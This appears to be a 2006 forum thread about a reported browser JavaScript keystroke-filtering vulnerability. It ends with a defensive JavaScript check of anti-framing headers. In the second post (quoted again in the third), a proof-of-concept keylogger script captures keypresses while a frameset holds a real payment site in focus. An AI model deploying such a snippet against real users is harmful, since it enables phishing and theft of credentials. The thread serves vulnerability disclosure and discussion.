Computer Security - Multiple Vendor Web Browser JavaScript Key Filtering Vulnerability

 
Old 06-07-2006, 12:13 AM   #1


Affects: IE, Firefox, etc

Multiple Vendor Web Browser JavaScript Key Filtering Vulnerability

"Multiple web browser products are susceptible to a JavaScript key-filtering
vulnerability. This issue is due to the failure of the browsers to securely
handle keystroke input from users.

This issue is demonstrated to allow attackers to divert keystrokes from one
input form in a webpage to a hidden file upload dialog in the same page.
This may allow remote attackers to initiate file uploads from unsuspecting
users. Other attacks may also be possible.

Exploiting this issue requires that users manually type the full path of
files that attackers wish to download. This may require substantial typing
from targeted users, so keyboard-based games, blogs, or other similar pages
are likely to be utilized by attackers to entice users to enter the
required keyboard input to exploit this issue.

Mozilla Suite, Mozilla Firefox, Mozilla SeaMonkey, Netscape Navigator, and
Microsoft Internet Explorer are all reportedly vulnerable to this issue."


http://www.securityfocus.com/bid/18308/discuss


-- Imhotep


imhotep
Old 06-07-2006, 01:01 AM   #2
Sebastian Gottschalk
 
imhotep wrote:

> This issue is demonstrated to allow attackers to divert keystrokes from one
> input form in a webpage to a hidden file upload dialog in the same page.
> This may allow remote attackers to initiate file uploads from unsuspecting
> users. Other attacks may also be possible.


Where exactly is the vulnerability? It's the same as entering the data
into an invisible form. It's purely PEBKAC.

> Exploiting this issue requires that users manually type the full path of
> files that attackers wish to download. This may require substantial typing
> from targeted users, so keyboard-based games, blogs, or other similar pages
> are likely to be utilized by attackers to entice users to enter the
> required keyboard input to exploit this issue.


What about keystroke sniffing across frames and domains? For IE this is
actually told to be a feature, like any other phishing support. Now this
is a serious problem because one can spoof the address bar on IE as well
and you'll get the SSL lock for free.

<script>
var keylog='Capturing: ';
document.onkeypress = function () {
k = window.event.keyCode;
window.status = keylog += String.fromCharCode(k) + '[' + k +']';}
</script>
<frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
<frame src="https://www.paypal.com" scrolling="auto">
</frameset>

BTW, [X] Tell news!


Sebastian Gottschalk
Old 06-07-2006, 02:01 AM   #3
imhotep
 
Sebastian Gottschalk wrote:

> imhotep wrote:
>
>> This issue is demonstrated to allow attackers to divert keystrokes from
>> one input form in a webpage to a hidden file upload dialog in the same
>> page. This may allow remote attackers to initiate file uploads from
>> unsuspecting users. Other attacks may also be possible.

>
> Where exactly is the vulnerability? It's the same as entering the data
> into an invisible form. It's purely PEBKAC.


PEBKAC????

>> Exploiting this issue requires that users manually type the full path of
>> files that attackers wish to download. This may require substantial
>> typing from targeted users, so keyboard-based games, blogs, or other
>> similar pages are likely to be utilized by attackers to entice users to
>> enter the required keyboard input to exploit this issue.

>
> What about keystroke sniffing across frames and domains? For IE this is
> actually told to be a feature, like any other phishing support. Now this
> is a serious problem because one can spoof the address bar on IE as well
> and you'll get the SSL lock for free.


hummmm "feature" eh? Go figures...

> <script>
> var keylog='Capturing: ';
> document.onkeypress = function () {
> k = window.event.keyCode;
> window.status = keylog += String.fromCharCode(k) + '[' + k +']';}
> </script>
> <frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
> <frame src="https://www.paypal.com" scrolling="auto">
> </frameset>
>
> BTW, [X] Tell news!



Imhotep


imhotep
Old 06-07-2006, 03:46 AM   #4
Sebastian Gottschalk
 
imhotep wrote:

>> Where exactly is the vulnerability? It's the same as entering the data
>> into an invisible form. It's purely PEBKAC.

>
> PEBKAC????


Problem exists between keyboard and chair.

>> What about keystroke sniffing across frames and domains? For IE this is
>> actually told to be a feature, like any other phishing support. Now this
>> is a serious problem because one can spoof the address bar on IE as well
>> and you'll get the SSL lock for free.

>
> hummmm "feature" eh? Go figures...


Don't tell me, tell Microsoft. Keystroke sniffing has been reported a
year ago or so. Same goes for all other phishing stuff IE is open for,
like putting a DIV layer over a frame loaded with a website from another
domain.


Sebastian Gottschalk
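
The frameset snippet in post #2 and the DIV-over-frame case in post #4 both depend on the target site allowing a page from another domain to load it in a frame. As an added example (not code from any poster in this thread), the JavaScript below checks whether a response's `X-Frame-Options` and CSP `frame-ancestors` headers permit a given embedding origin; the function names and the `.example` origins are assumptions.

```javascript
// Added example. Header names are real; function names and origins are constructed.

// Return the frame-ancestors source list from a CSP header value, or null if absent.
function frameAncestors(csp) {
  for (const directive of (csp || '').split(';')) {
    const [name, ...sources] = directive.trim().split(/\s+/);
    if (name.toLowerCase() === 'frame-ancestors') return sources;
  }
  return null;
}

// Match one source expression against the embedding page's origin.
// Simplification: ports and paths in a source are compared literally.
function sourceMatches(source, embedder, self) {
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return embedder === self;
  if (s === '*') return true;
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return embedder.startsWith(s); // scheme, e.g. https:
  const wild = s.match(/^([a-z][a-z0-9+.-]*):\/\/\*(\..+)$/); // e.g. https://*.host
  if (wild) return embedder.startsWith(wild[1] + '://') && embedder.endsWith(wild[2]);
  return s === embedder;
}

// True if a page at `embedder` may load the response (served from `self`) in a frame.
function canBeFramedBy(headers, embedder, self) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v);
  const from = embedder.toLowerCase();
  const sources = frameAncestors(h['content-security-policy']);
  if (sources !== null) {
    // When frame-ancestors is present it is enforced and X-Frame-Options is ignored.
    return sources.some((s) => sourceMatches(s, from, self.toLowerCase()));
  }
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return from === self.toLowerCase();
  return true; // no framing policy: any origin can embed the page
}

// Constructed sample responses for a site at https://bank.example
const SELF = 'https://bank.example';
const OTHER = 'https://other.example';
console.log(canBeFramedBy({}, OTHER, SELF));
console.log(canBeFramedBy({ 'X-Frame-Options': 'DENY' }, OTHER, SELF));
console.log(canBeFramedBy({ 'Content-Security-Policy': "frame-ancestors 'self'" }, OTHER, SELF));
```

A response with neither header is reported as frameable from any origin.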